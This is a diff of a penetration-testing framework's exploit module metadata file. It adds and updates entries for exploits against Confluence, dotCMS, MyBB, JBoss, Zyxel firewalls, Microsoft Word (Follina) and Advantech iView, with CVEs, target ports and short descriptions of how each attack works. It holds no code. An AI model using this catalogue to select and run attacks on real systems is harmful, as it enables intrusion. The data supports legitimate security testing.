+      "CVE-2022-30526",
+      "URL-https://www.zyxel.com/support/Zyxel-security-advisory-authenticated-directory-traversal-vulnerabilities-of-firewalls.shtml"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, mips64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Unix Command",
+      "Linux Dropper"
+    ],
+    "mod_time": "2022-07-19 03:29:11 +0000",
+    "path": "/modules/exploits/linux/local/zyxel_suid_cp_lpe.rb",
+    "is_install_path": true,
+    "ref_name": "linux/local/zyxel_suid_cp_lpe",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": true
+  },
  "exploit_linux/misc/accellion_fta_mpipe2": {
    "name": "Accellion FTA MPIPE2 Command Execution",
    "fullname": "exploit/linux/misc/accellion_fta_mpipe2",
@@ -73032,7 +74558,7 @@
    "targets": [
      "Cisco RV340 Firmware Version <= 1.0.03.24"
    ],
-    "mod_time": "2022-05-11 18:30:11 +0000",
+    "mod_time": "2022-06-10 14:01:57 +0000",
    "path": "/modules/exploits/linux/misc/cisco_rv340_sslvpn.rb",
    "is_install_path": true,
    "ref_name": "linux/misc/cisco_rv340_sslvpn",
@@ -73040,9 +74566,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
-      "Stability": "crash-service-restarts",
-      "Reliability": "repeatable-session",
-      "SideEffects": null
+      "Stability": [
+        "crash-service-restarts"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+
+      ]
    },
    "session_types": false,
    "needs_cleanup": null
@@ -73274,7 +74806,7 @@
    "description": "This module exploits a buffer overflow in the RTSP request parsing\n        code of Hikvision DVR appliances. The Hikvision DVR devices record\n        video feeds of surveillance cameras and offer remote administration\n        and playback of recorded footage.\n\n        The vulnerability is present in several models / firmware versions\n        but due to the available test device this module only supports\n        the DS-7204 model.",
    "references": [
      "CVE-2014-4880",
-      "URL-https://www.rapid7.com/blog/post/2014/11/19/r7-2014-18-hikvision-dvr-devices--multiple-vulnerabilities"
+      "URL-https://www.rapid7.com/blog/post/2014/11/19/r7-2014-18-hikvision-dvr-devices-multiple-vulnerabilities"
    ],
    "platform": "Linux",
    "arch": "armle",
@@ -73289,7 +74821,7 @@
      "DS-7204 Firmware V2.2.10 build 131009",
      "Debug Target"
    ],
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2022-06-22 15:49:43 +0000",
    "path": "/modules/exploits/linux/misc/hikvision_rtsp_bof.rb",
    "is_install_path": true,
    "ref_name": "linux/misc/hikvision_rtsp_bof",
@@ -77636,10 +79168,13 @@
      "mihi",
      "joev <joev@metasploit.com>"
    ],
-    "description": "This exploit dynamically creates a .xpi addon file.\n        The resulting bootstrapped Firefox addon is presented to\n        the victim via a web page. The victim's Firefox browser\n        will pop a dialog asking if they trust the addon.\n\n        Once the user clicks \"install\", the addon is installed and\n        executes the payload with full user permissions. As of Firefox\n        4, this will work without a restart as the addon is marked to\n        be \"bootstrapped\". As the addon will execute the payload after\n        each Firefox restart, an option can be given to automatically\n        uninstall the addon once the payload has been executed.",
+    "description": "Mozilla Firefox before version 41 allowed users to install\n        unsigned browser extensions from arbitrary web servers.\n\n        This module dynamically creates an unsigned .xpi addon file.\n        The resulting bootstrapped Firefox addon is presented to\n        the victim via a web page. The victim's Firefox browser\n        will pop a dialog asking if they trust the addon.\n\n        Once the user clicks \"install\", the addon is installed and\n        executes the payload with full user permissions. As of Firefox\n        4, this will work without a restart as the addon is marked to\n        be \"bootstrapped\". As the addon will execute the payload after\n        each Firefox restart, an option can be given to automatically\n        uninstall the addon once the payload has been executed.\n\n        As of Firefox 41, unsigned extensions can still be installed\n        on Firefox Nightly, Unbranded and Development builds when\n        configured with `xpinstall.signatures.required` set to `false`.\n\n        Note: this module generates legacy extensions which are\n        supported only in Firefox before version 57.",
    "references": [
-      "URL-https://developer.mozilla.org/en/Extensions/Bootstrapped_extensions",
-      "URL-http://dvlabs.tippingpoint.com/blog/2007/06/27/xpi-the-next-malware-vector"
+      "URL-https://blog.mozilla.org/addons/2015/02/10/extension-signing-safer-experience/",
+      "URL-https://blog.mozilla.org/addons/2015/04/15/the-case-for-extension-signing/",
+      "URL-https://support.mozilla.org/en-US/kb/frequently-asked-questions-firefox-addon",
+      "URL-https://web.archive.org/web/20170727035940/https://developer.mozilla.org/en-US/Add-ons/Bootstrapped_extensions",
+      "URL-https://web.archive.org/web/20160322014439/https://dvlabs.tippingpoint.com/blog/2007/06/27/xpi-the-next-malware-vector"
    ],
    "platform": "Java,Linux,OSX,Solaris,Windows",
    "arch": "",
@@ -77654,7 +79189,7 @@
      "Universal (Javascript XPCOM Shell)",
      "Native Payload"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2022-09-05 02:23:37 +0000",
    "path": "/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb",
    "is_install_path": true,
    "ref_name": "multi/browser/firefox_xpi_bootstrapped_addon",
@@ -77662,6 +79197,17 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk",
+        "screen-effects"
+      ],
+      "Stability": [
+        "crash-safe"
+      ]
    },
    "session_types": false,
    "needs_cleanup": null
@@ -80542,6 +82088,75 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_multi/http/atlassian_confluence_namespace_ognl_injection": {
+    "name": "Atlassian Confluence Namespace OGNL Injection",
+    "fullname": "exploit/multi/http/atlassian_confluence_namespace_ognl_injection",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-06-02",
+    "type": "exploit",
+    "author": [
+      "Unknown",
+      "bturner-r7",
+      "jbaines-r7",
+      "Spencer McIntyre"
+    ],
+    "description": "This module exploits an OGNL injection in Atlassian Confluence servers. A specially crafted URI can be used to\n          evaluate an OGNL expression resulting in OS command execution.",
+    "references": [
+      "CVE-2022-26134",
+      "URL-https://jira.atlassian.com/browse/CONFSERVER-79000?src=confmacro",
+      "URL-https://gist.githubusercontent.com/bturner-r7/1d0b62fac85235b94f1c95cc4c03fcf3/raw/478e53b6f68b5150eefd53e0956f23d53618d250/confluence-exploit.py",
+      "URL-https://github.com/jbaines-r7/through_the_wire",
+      "URL-https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis"
+    ],
+    "platform": "Linux,Unix,Windows",
+    "arch": "cmd, x86, x64",
+    "rport": 8090,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix Command",
+      "Linux Dropper",
+      "Windows Command",
+      "Windows Dropper"
+    ],
+    "mod_time": "2022-06-15 17:11:56 +0000",
+    "path": "/modules/exploits/multi/http/atlassian_confluence_namespace_ognl_injection.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/atlassian_confluence_namespace_ognl_injection",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_multi/http/atlassian_confluence_webwork_ognl_injection": {
    "name": "Atlassian Confluence WebWork OGNL Injection",
    "fullname": "exploit/multi/http/atlassian_confluence_webwork_ognl_injection",
@@ -81647,7 +83262,7 @@
      "Daniil Dmitriev",
      "Dmitry (rrock) Shchannikov"
    ],
-    "description": "Widget Connector Macro is part of Atlassian Confluence Server and Data Center that\n        allows embed online videos, slideshows, photostreams and more directly into page.\n        A _template parameter can be used to inject remote Java code into a Velocity template,\n        and gain code execution. Authentication is unrequired to exploit this vulnerability.\n        By default, Java payload will be used because it is cross-platform, but you can also\n        specify which native payload you want (Linux or Windows).\n\n        Confluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version\n        6.13.0 before 6.13.3 and from version 6.14.0 before 6.14.2 are affected.\n\n        This vulnerability was originally discovered by Daniil Dmitriev\n        https://twitter.com/ddv_ua.",
+    "description": "Widget Connector Macro is part of Atlassian Confluence Server and Data Center that\n          allows embed online videos, slideshows, photostreams and more directly into page.\n          A _template parameter can be used to inject remote Java code into a Velocity template,\n          and gain code execution. Authentication is unrequired to exploit this vulnerability.\n          By default, Java payload will be used because it is cross-platform, but you can also\n          specify which native payload you want (Linux or Windows).\n\n          Confluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version\n          6.13.0 before 6.13.3 and from version 6.14.0 before 6.14.2 are affected.\n\n          This vulnerability was originally discovered by Daniil Dmitriev\n          https://twitter.com/ddv_ua.",
    "references": [
      "CVE-2019-3396",
      "URL-https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html",
@@ -81677,7 +83292,7 @@
      "Windows",
      "Linux"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2022-07-01 08:43:47 +0000",
    "path": "/modules/exploits/multi/http/confluence_widget_connector.rb",
    "is_install_path": true,
    "ref_name": "multi/http/confluence_widget_connector",
@@ -81685,6 +83300,16 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
    },
    "session_types": false,
    "needs_cleanup": true
@@ -81913,6 +83538,69 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_multi/http/dotcms_file_upload_rce": {
+    "name": "DotCMS RCE via Arbitrary File Upload.",
+    "fullname": "exploit/multi/http/dotcms_file_upload_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-05-03",
+    "type": "exploit",
+    "author": [
+      "Shubham Shah",
+      "Hussein Daher",
+      "jheysel-r7"
+    ],
+    "description": "When files are uploaded into dotCMS via the content API, but before they become content, dotCMS writes the\n          file down in a temp directory.  In the case of this vulnerability, dotCMS does not sanitize the filename\n          passed in via the multipart request header and thus does not sanitize the temp file's name.  This allows a\n          specially crafted request to POST files to dotCMS via the ContentResource (POST /api/content)  that get\n          written outside of the dotCMS temp directory.  In the case of this exploit, an attacker can upload a special\n          .jsp file to the webapp/ROOT directory of dotCMS which can allow for remote code execution.",
+    "references": [
+      "CVE-2022-26352",
+      "URL-https://blog.assetnote.io/2022/05/03/hacking-a-bank-using-dotcms-rce/"
+    ],
+    "platform": "Linux,Windows",
+    "arch": "",
+    "rport": 8443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Java Linux",
+      "Java Windows"
+    ],
+    "mod_time": "2022-06-01 10:54:02 +0000",
+    "path": "/modules/exploits/multi/http/dotcms_file_upload_rce.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/dotcms_file_upload_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_multi/http/drupal_drupageddon": {
    "name": "Drupal HTTP Parameter Key/Value SQL Injection",
    "fullname": "exploit/multi/http/drupal_drupageddon",
@@ -84022,7 +85710,7 @@
      "jamcut",
      "thesubtlety"
    ],
-    "description": "This module uses the Jenkins-CI Groovy script console to execute\n        OS commands using Java.",
+    "description": "This module uses the Jenkins-CI Groovy script console to execute\n          OS commands using Java.",
    "references": [
      "URL-https://wiki.jenkins-ci.org/display/JENKINS/Jenkins+Script+Console"
    ],
@@ -84049,7 +85737,7 @@
      "Linux",
      "Unix CMD"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2022-09-13 16:09:28 +0000",
    "path": "/modules/exploits/multi/http/jenkins_script_console.rb",
    "is_install_path": true,
    "ref_name": "multi/http/jenkins_script_console",
@@ -85958,6 +87646,74 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_multi/http/mybb_rce_cve_2022_24734": {
+    "name": "MyBB Admin Control Code Injection RCE",
+    "fullname": "exploit/multi/http/mybb_rce_cve_2022_24734",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-03-09",
+    "type": "exploit",
+    "author": [
+      "Cillian Collins",
+      "Altelus",
+      "Christophe De La Fuente"
+    ],
+    "description": "This exploit module leverages an improper input validation\n          vulnerability in MyBB prior to `1.8.30` to execute arbitrary code in\n          the context of the user running the application.\n\n          MyBB Admin Control setting page calls PHP `eval` function with an\n          unsanitized user input. The exploit adds a new setting, injecting the\n          payload in the vulnerable field, and triggers its execution with a\n          second request. Finally, it takes care of cleaning up and removes the\n          setting.\n\n          Note that authentication is required for this exploit to work and the\n          account must have rights to add or update settings (typically, myBB\n          administrator role).",
+    "references": [
+      "URL-https://github.com/mybb/mybb/security/advisories/GHSA-876v-gwgh-w57f",
+      "URL-https://www.zerodayinitiative.com/advisories/ZDI-22-503/",
+      "URL-https://github.com/Altelus1/CVE-2022-24734",
+      "CVE-2022-24734"
+    ],
+    "platform": "Linux,PHP,Unix,Windows",
+    "arch": "php, cmd, x86, x64",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "PHP",
+      "Unix (In-Memory)",
+      "Linux (Dropper)",
+      "Windows (In-Memory)",
+      "Windows (Dropper)"
+    ],
+    "mod_time": "2022-05-30 16:24:18 +0000",
+    "path": "/modules/exploits/multi/http/mybb_rce_cve_2022_24734.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/mybb_rce_cve_2022_24734",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "config-changes",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_multi/http/nas4free_php_exec": {
    "name": "NAS4Free Arbitrary Remote Code Execution",
    "fullname": "exploit/multi/http/nas4free_php_exec",
@@ -87306,7 +89062,7 @@
      "PHP",
      "Shell Command"
    ],
-    "mod_time": "2021-11-23 07:58:07 +0000",
+    "mod_time": "2022-06-03 11:23:53 +0000",
    "path": "/modules/exploits/multi/http/php_fpm_rce.rb",
    "is_install_path": true,
    "ref_name": "multi/http/php_fpm_rce",
@@ -87581,7 +89337,7 @@
      "PHPMailer <5.2.18",
      "PHPMailer 5.2.18 - 5.2.19"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2022-06-29 12:24:29 +0000",
    "path": "/modules/exploits/multi/http/phpmailer_arg_injection.rb",
    "is_install_path": true,
    "ref_name": "multi/http/phpmailer_arg_injection",
@@ -90255,7 +92011,7 @@
      "Windows Universal",
      "Linux Universal"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2022-06-29 19:10:52 +0000",
    "path": "/modules/exploits/multi/http/struts_code_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/http/struts_code_exec",
@@ -90373,7 +92129,7 @@
      "Linux Universal",
      "Java Universal"
    ],
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2022-06-29 19:10:52 +0000",
    "path": "/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb",
    "is_install_path": true,
    "ref_name": "multi/http/struts_code_exec_exception_delegator",
@@ -94997,6 +96753,59 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_multi/misc/jboss_remoting_unified_invoker_rce": {
+    "name": "JBOSS EAP/AS Remoting Unified Invoker RCE",
+    "fullname": "exploit/multi/misc/jboss_remoting_unified_invoker_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-12-11",
+    "type": "exploit",
+    "author": [
+      "Joao Matos <@joaomatosf>",
+      "Marcio Almeida <@marcioalm>",
+      "Heyder Andrade <@HeyderAndrade>"
+    ],
+    "description": "An unauthenticated attacker with network access to the JBOSS\n          EAP/AS <= 6.x Remoting Unified Invoker interface can send a\n          serialized object to the interface to execute code on vulnerable hosts.",
+    "references": [
+      "URL-https://s3.amazonaws.com/files.joaomatosf.com/slides/alligator_slides.pdf"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64",
+    "rport": 4446,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Unix Command",
+      "Linux Dropper"
+    ],
+    "mod_time": "2022-07-12 09:08:19 +0000",
+    "path": "/modules/exploits/multi/misc/jboss_remoting_unified_invoker_rce.rb",
+    "is_install_path": true,
+    "ref_name": "multi/misc/jboss_remoting_unified_invoker_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_multi/misc/legend_bot_exec": {
    "name": "Legend Perl IRC Bot Remote Code Execution",
    "fullname": "exploit/multi/misc/legend_bot_exec",
@@ -95202,7 +97011,7 @@
      "Linux",
      "Windows"
    ],
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2022-06-28 17:02:51 +0000",
    "path": "/modules/exploits/multi/misc/nomad_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/misc/nomad_exec",
@@ -95213,11 +97022,11 @@
      "Stability": [
        "crash-safe"
      ],
-      "Reliability": [
+      "SideEffects": [
        "artifacts-on-disk",
        "ioc-in-logs"
      ],
-      "SideEffects": [
+      "Reliability": [
        "repeatable-session"
      ]
    },
@@ -95727,9 +97536,9 @@
    "author": [
      "Andres Rodriguez - 2Secure (@acamro) <acamro@gmail.com>"
    ],
-    "description": "An unauthenticated attacker with network access to the Oracle Weblogic Server T3\n        interface can send a malicious SOAP request to the interface WLS AsyncResponseService\n        to execute code on the vulnerable host.",
+    "description": "An unauthenticated attacker with network access to the Oracle Weblogic Server T3\n          interface can send a malicious SOAP request to the interface WLS AsyncResponseService\n          to execute code on the vulnerable host.",
    "references": [
-      "CVE-2017-10271",
+      "CVE-2019-2725",
      "CNVD-C-2019-48814",
      "URL-http://www.cnvd.org.cn/webinfo/show/4999",
      "URL-https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html",
@@ -95758,7 +97567,7 @@
      "Windows",
      "Solaris"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2022-07-07 18:05:56 +0000",
    "path": "/modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb",
    "is_install_path": true,
    "ref_name": "multi/misc/weblogic_deserialize_asyncresponseservice",
@@ -95766,6 +97575,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
    },
    "session_types": false,
    "needs_cleanup": null
@@ -96308,7 +98126,7 @@
      "Unix (In-Memory)",
      "Windows (In-Memory)"
    ],
-    "mod_time": "2022-02-15 08:47:50 +0000",
+    "mod_time": "2022-09-13 22:36:31 +0000",
    "path": "/modules/exploits/multi/php/ignition_laravel_debug_rce.rb",
    "is_install_path": true,
    "ref_name": "multi/php/ignition_laravel_debug_rce",
@@ -102844,7 +104662,7 @@
      "Erik de Jong",
      "Erik Wynter"
    ],
-    "description": "This module exploits LFI and log poisoning vulnerabilities\n          (CVE-2020-16152) in Aerohive NetConfig, version 10.0r8a\n          build-242466 and older in order to achieve unauthenticated remote\n          code execution as the root user. NetConfig is the Aerohive/Extreme\n          Networks HiveOS administrative webinterface. Vulnerable versions\n          allow for LFI because they rely on a version of PHP 5 that is\n          vulnerable to string truncation attacks. This module leverages this\n          issue in conjunction with log poisoning to gain RCE as root.\n\n          Upon successful exploitation, the Aerohive NetConfig application\n          will hang for as long as the spawned shell remains open. Closing\n          the session should render the app responsive again.\n\n          The module provides an automatic cleanup option to clean the log.\n          However, this option is disabled by default because any modifications\n          to the /tmp/messages log, even via sed, may render the target\n          (temporarily) unexploitable. This state can last over an hour.\n\n          This module has been successfully tested against Aerohive NetConfig\n          versions 8.2r4 and 10.0r7a.",
+    "description": "This module exploits LFI and log poisoning vulnerabilities\n          (CVE-2020-16152) in Aerohive NetConfig, version 10.0r8a\n          build-242466 and older in order to achieve unauthenticated remote\n          code execution as the root user. NetConfig is the Aerohive/Extreme\n          Networks HiveOS administrative webinterface. Vulnerable versions\n          allow for LFI because they rely on a version of PHP 5 that is\n          vulnerable to string truncation attacks. This module leverages this\n          issue in conjunction with log poisoning to gain RCE as root.\n\n          Upon successful exploitation, the Aerohive NetConfig application\n          may hang for as long as the spawned shell remains open. For the\n          Linux target, the MeterpreterTryToFork option (enabled by default)\n          will likely prevent this. If the app hangs, closing the session\n          should render it responsive again.\n\n          The module provides an automatic cleanup option to clean the log.\n          However, this option is disabled by default because any modifications\n          to the /tmp/messages log, even via sed, may render the target\n          (temporarily) unexploitable. This state can last over an hour.\n\n          This module has been successfully tested against Aerohive NetConfig\n          versions 8.2r4 and 10.0r7a.",
    "references": [
      "CVE-2020-16152",
      "URL-https://github.com/eriknl/CVE-2020-16152"
@@ -102871,7 +104689,7 @@
      "Linux",
      "CMD"
    ],
-    "mod_time": "2021-11-02 19:58:16 +0000",
+    "mod_time": "2022-07-01 06:15:13 +0000",
    "path": "/modules/exploits/unix/webapp/aerohive_netconfig_lfi_log_poison_rce.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/aerohive_netconfig_lfi_log_poison_rce",
@@ -103350,7 +105168,7 @@
      "Linux (x64)",
      "Linux (cmd)"
    ],
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2022-06-10 14:01:57 +0000",
    "path": "/modules/exploits/unix/webapp/bolt_authenticated_rce.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/bolt_authenticated_rce",
@@ -103358,7 +105176,9 @@
    "post_auth": true,
    "default_credential": false,
    "notes": {
-      "NOCVE": "0day",
+      "NOCVE": [
+        "0day"
+      ],
      "Stability": [
        "service-resource-loss"
      ],
@@ -111110,7 +112930,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2022-06-29 19:10:52 +0000",
    "path": "/modules/exploits/windows/antivirus/ams_xfr.rb",
    "is_install_path": true,
    "ref_name": "windows/antivirus/ams_xfr",
@@ -117763,7 +119583,7 @@
    "description": "This module exploits a vulnerability in the update functionality of\n        Malwarebytes Anti-Malware consumer before 2.0.3 and Malwarebytes\n        Anti-Exploit consumer 1.03.1.1220.\n        Due to the lack of proper update package validation, a man-in-the-middle\n        (MITM) attacker could execute arbitrary code by spoofing the update server\n        data-cdn.mbamupdates.com and uploading an executable. This module has\n        been tested successfully with MBAM 2.0.2.1012 and MBAE 1.03.1.1220.",
    "references": [
      "CVE-2014-4936",
-      " OSVDB-116050",
+      "OSVDB-116050",
      "URL-http://blog.0x3a.com/post/104954032239/cve-2014-4936-malwarebytes-anti-malware-and"
    ],
    "platform": "Windows",
@@ -117778,7 +119598,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2021-02-17 12:33:59 +0000",
+    "mod_time": "2022-06-10 08:47:41 +0000",
    "path": "/modules/exploits/windows/browser/malwarebytes_update_exec.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/malwarebytes_update_exec",
@@ -132278,6 +134098,67 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_windows/fileformat/word_msdtjs_rce": {
+    "name": "Microsoft Office Word MSDTJS",
+    "fullname": "exploit/windows/fileformat/word_msdtjs_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-05-29",
+    "type": "exploit",
+    "author": [
+      "nao sec",
+      "mekhalleh (RAMELLA Sébastien)",
+      "bwatters-r7"
+    ],
+    "description": "This module generates a malicious Microsoft Word document that when loaded, will leverage the remote template\n          feature to fetch an `HTML` document and then use the `ms-msdt` scheme to execute `PowerShell` code.",
+    "references": [
+      "CVE-2022-30190",
+      "URL-https://www.reddit.com/r/blueteamsec/comments/v06w2o/suspected_microsoft_word_zero_day_in_the_wild/",
+      "URL-https://twitter.com/nao_sec/status/1530196847679401984?t=3Pjrpdog_H6OfMHVLMR5eQ&s=19",
+      "URL-https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/",
+      "URL-https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e",
+      "URL-https://twitter.com/GossiTheDog/status/1531608245009367040",
+      "URL-https://github.com/JMousqueton/PoC-CVE-2022-30190"
+    ],
+    "platform": "Windows",
+    "arch": "x86, x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Microsoft Office Word"
+    ],
+    "mod_time": "2022-08-25 15:56:39 +0000",
+    "path": "/modules/exploits/windows/fileformat/word_msdtjs_rce.rb",
+    "is_install_path": true,
+    "ref_name": "windows/fileformat/word_msdtjs_rce",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "AKA": [
+        "Follina"
+      ],
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "unreliable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_windows/fileformat/word_mshtml_rce": {
    "name": "Microsoft Office Word Malicious MSHTML RCE",
    "fullname": "exploit/windows/fileformat/word_mshtml_rce",
@@ -135751,6 +137632,69 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_windows/http/advantech_iview_networkservlet_cmd_inject": {
+    "name": "Advantech iView NetworkServlet Command Injection",
+    "fullname": "exploit/windows/http/advantech_iview_networkservlet_cmd_inject",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-06-28",
+    "type": "exploit",
+    "author": [
+      "rgod",
+      "y4er",
+      "Shelby Pace"
+    ],
+    "description": "Versions of Advantech iView software below `5.7.04.6469` are\n          vulnerable to an unauthenticated command injection vulnerability\n          via the `NetworkServlet` endpoint.\n          The database backup functionality passes a user-controlled parameter,\n          `backup_file` to the `mysqldump` command. The sanitization functionality only\n          tests for SQL injection attempts and directory traversal, so leveraging the\n          `-r` and `-w` `mysqldump` flags permits exploitation.\n          The command injection vulnerability is used to write a payload on the target\n          and achieve remote code execution as NT AUTHORITY\\SYSTEM.",
+    "references": [
+      "URL-https://y4er.com/post/cve-2022-2143-advantech-iview-networkservlet-command-inject-rce/",
+      "CVE-2022-2143"
+    ],
+    "platform": "Windows",
+    "arch": "x86, x64, cmd",
+    "rport": 8080,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Windows Dropper",
+      "Windows Command"
+    ],
+    "mod_time": "2022-08-09 16:12:54 +0000",
+    "path": "/modules/exploits/windows/http/advantech_iview_networkservlet_cmd_inject.rb",
+    "is_install_path": true,
+    "ref_name": "windows/http/advantech_iview_networkservlet_cmd_inject",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_windows/http/advantech_iview_unauth_rce": {
    "name": "Advantech iView Unauthenticated Remote Code Execution",
    "fullname": "exploit/windows/http/advantech_iview_unauth_rce",
@@ -136724,7 +138668,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2022-06-29 19:10:52 +0000",
    "path": "/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb",
    "is_install_path": true,
    "ref_name": "windows/http/ca_totaldefense_regeneratereports",
@@ -138236,11 +140180,11 @@
    "session_types": false,
    "needs_cleanup": null
  },
-  "exploit_windows/http/exchange_chainedserializationbinder_denylist_typo_rce": {
-    "name": "Microsoft Exchange Server ChainedSerializationBinder Deny List Typo RCE",
-    "fullname": "exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce",
+  "exploit_windows/http/exchange_chainedserializationbinder_rce": {
+    "name": "Microsoft Exchange Server ChainedSerializationBinder RCE",
+    "fullname": "exploit/windows/http/exchange_chainedserializationbinder_rce",
    "aliases": [
-
+      "exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce"
    ],
